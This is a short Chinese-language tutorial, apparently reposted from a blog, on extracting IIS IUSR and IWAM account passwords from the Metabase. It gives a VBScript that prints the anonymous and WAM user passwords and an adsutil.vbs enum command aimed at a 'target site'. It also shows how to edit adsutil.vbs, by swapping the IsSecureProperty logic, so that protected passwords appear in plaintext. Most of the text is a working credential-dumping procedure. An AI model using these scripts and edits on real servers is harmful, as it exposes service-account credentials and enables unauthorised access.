IUSR_<计算机名> 帐户就是“Web 匿名用户”帐户,它是在 IIS 的安装过程中创建的。该密码存储在本地 SAM 中(对于 Windows 2000 域控制器而言存储在 Active Directory 中),Metabase 中也存储着该密码。由于该密码存储在 Metabase 中,您就可以使用一个 .vbs 脚本将 IUSR 和 IWAM 这两个帐户的密码提取出来,方法如下:
Dim IIsObject Set IIsObject = GetObject("IIS://localhost/w3svc") WScript.Echo "AnonymousUserName = " & IIsObject.Get("AnonymousUserName") & vbCrlf & _ "AnonymousUserPass = " & IIsObject.Get("AnonymousUserPass") &vbCrlf &vbCrlf &_ "WAMUserName = " & IIsObject.Get("WAMUserName") & vbCrlf & _ "WAMUserPass = " & IIsObject.Get("WAMUserPass") Set IIsObject = Nothing
如果你用的的默认的IUSER,按上面那样获取起来比较简单。
通过此脚本可以显示在主属性级别上针对 Web 服务设置的 IUSR 和 IWAM 帐户密码。如果您已将匿名验证配置为使用另外一个用户帐户来访问网站或目录,那么就用下面的办法吧
这个办法需要用到强大的Adsutil.vbs
Adsutil.vbs在win2003下的 系统盘\Inetpub\AdminScripts\下可以获取。
在cmd里执行下面的语句就可以看到目标站的匿名帐号
cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum w3svc\1390437375\root
这里的1390437375可以通过 系统目录inetsrv\MetaBase.xml 里查看到
执行了上面这个就可以看到帐号了,但是密码不是明文的。
这个时候我们要修改一下adsutil.vbs
将
If (Attribute = True) Then IsSecureProperty = True Else IsSecureProperty = False End If
改为
If (Attribute = True) Then IsSecureProperty = False Else IsSecureProperty = True End If
就是互换下位置
然后再执行上面的cmd命令
这样密码就明文了,帐号是***
原文出处:猪先飞